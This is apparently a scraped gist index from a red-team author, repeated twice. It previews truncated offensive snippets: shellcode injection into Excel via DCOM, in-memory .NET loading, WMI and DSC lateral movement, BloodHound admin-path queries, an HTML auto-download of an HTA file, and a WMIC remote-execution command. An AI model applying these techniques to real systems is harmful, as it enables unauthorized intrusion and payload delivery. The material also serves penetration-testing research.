Steve Borosh rvrsh3ll

## gist:81cef0f2b54ee62302a9bf3cd4ab6ab0
MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer
RETURN u.name

That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
---------------

MATCH
(U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer)
WITH
U.name as n,

## Invoke-Excel4DCOM64.ps1
#**********************************************************************
# Invoke-Excel4DCOM64.ps1
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by  Philip Tsukerman (@PhilipTsukerman) / Cybereason
# Date: 2019/04/21
# Version: 1.1
#**********************************************************************

function Invoke-Excel4DCOM
{

## mscorlib_load_assembly.vba
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb

Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr

#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&

## ExampleMANIFEST.MF
Bundle-Name: rvrsh3ll osgi package
Bundle-Description: rvrsh3ll osgi package
Bundle-SymbolicName: com.rvrsh3ll.osgi.shellme.Activator
Bundle-Vendor: rvrsh3ll
Bundle-Version: 1.0.0
Import-Package: org.osgi.framework
Bundle-Activator: com.rvrsh3ll.osgi.shellme.Activator

## PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/

<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
    ResourceID = "[Script]ScriptExample";
    GetScript = "\"$(Get-Date): I am being GET\"     | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
    TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";

## subteegadget.cs
[JS File]
function setversion() {
}

function debug(s) {}

function base64ToStream(b) {
	var enc = new ActiveXObject("System.Text.ASCIIEncoding");
	var length = enc.GetByteCount_2(b);
	var ba = enc.GetBytes_4(b);

## Find-Assemblies.ps1
Param([parameter(Mandatory=$true,
   HelpMessage="Directory to search for .NET Assemblies in.")]
   $Directory,
   [parameter(Mandatory=$false,
   HelpMessage="Whether or not to search recursively.")]
   [switch]$Recurse = $false,
   [parameter(Mandatory=$false,
   HelpMessage="Whether or not to include DLLs in the search.")]
   [switch]$DLLs = $false,
   [parameter(Mandatory=$false,

## Invoke-WMISMB.ps1

function Invoke-SMBWmi {

    [CmdletBinding()]
    param(
        [String[]]
        $ComputerName = ".",

        [String]
        $Pipename = "tf12lol"

## downloader.html
<a href="#" id="download">legit</al>
<script>
var element = document.getElementById("download");
element.href = "legit.hta";
element.click();
</script>

## wmicLateralMovement.txt
As always, only for use on networks you own or have permission to test against.

Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely.
If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps.  However, for one-offs this works fine as well.

The process involves a total of four commands, three of which can be combined on the command line to form one large block.

Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager)
    wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName
	MATCH (u:User)-[r:AdminTo\|MemberOf*1..]->(c:Computer
	RETURN u.name

	That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
	---------------

	MATCH
	(U:User)-[r:MemberOf\|:AdminTo*1..]->(C:Computer)
	WITH
	U.name as n,
	#**********************************************************************
	# Invoke-Excel4DCOM64.ps1
	# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
	# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason
	# Date: 2019/04/21
	# Version: 1.1
	#**********************************************************************

	function Invoke-Excel4DCOM
	{
	' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb

	Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
	Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
	Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr

	#If Win64 Then
	Const LS As LongPtr = 8&
	#Else
	Const LS As LongPtr = 4&
	Bundle-Name: rvrsh3ll osgi package
	Bundle-Description: rvrsh3ll osgi package
	Bundle-SymbolicName: com.rvrsh3ll.osgi.shellme.Activator
	Bundle-Vendor: rvrsh3ll
	Bundle-Version: 1.0.0
	Import-Package: org.osgi.framework
	Bundle-Activator: com.rvrsh3ll.osgi.shellme.Activator
	# This idea originated from this blog post on Invoke DSC Resources directly:
	# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/

	<#
	$MOFContents = @'
	instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
	{
	ResourceID = "[Script]ScriptExample";
	GetScript = "\"$(Get-Date): I am being GET\" \| Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
	TestScript = "\"$(Get-Date): I am being TESTED\" \| Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
	[JS File]
	function setversion() {
	}

	function debug(s) {}

	function base64ToStream(b) {
	var enc = new ActiveXObject("System.Text.ASCIIEncoding");
	var length = enc.GetByteCount_2(b);
	var ba = enc.GetBytes_4(b);
	Param([parameter(Mandatory=$true,
	HelpMessage="Directory to search for .NET Assemblies in.")]
	$Directory,
	[parameter(Mandatory=$false,
	HelpMessage="Whether or not to search recursively.")]
	[switch]$Recurse = $false,
	[parameter(Mandatory=$false,
	HelpMessage="Whether or not to include DLLs in the search.")]
	[switch]$DLLs = $false,
	[parameter(Mandatory=$false,

	function Invoke-SMBWmi {

	[CmdletBinding()]
	param(
	[String[]]
	$ComputerName = ".",

	[String]
	$Pipename = "tf12lol"
	<a href="#" id="download">legit</al>
	<script>
	var element = document.getElementById("download");
	element.href = "legit.hta";
	element.click();
	</script>
	As always, only for use on networks you own or have permission to test against.

	Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely.
	If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well.

	The process involves a total of four commands, three of which can be combined on the command line to form one large block.

	Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager)
	wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName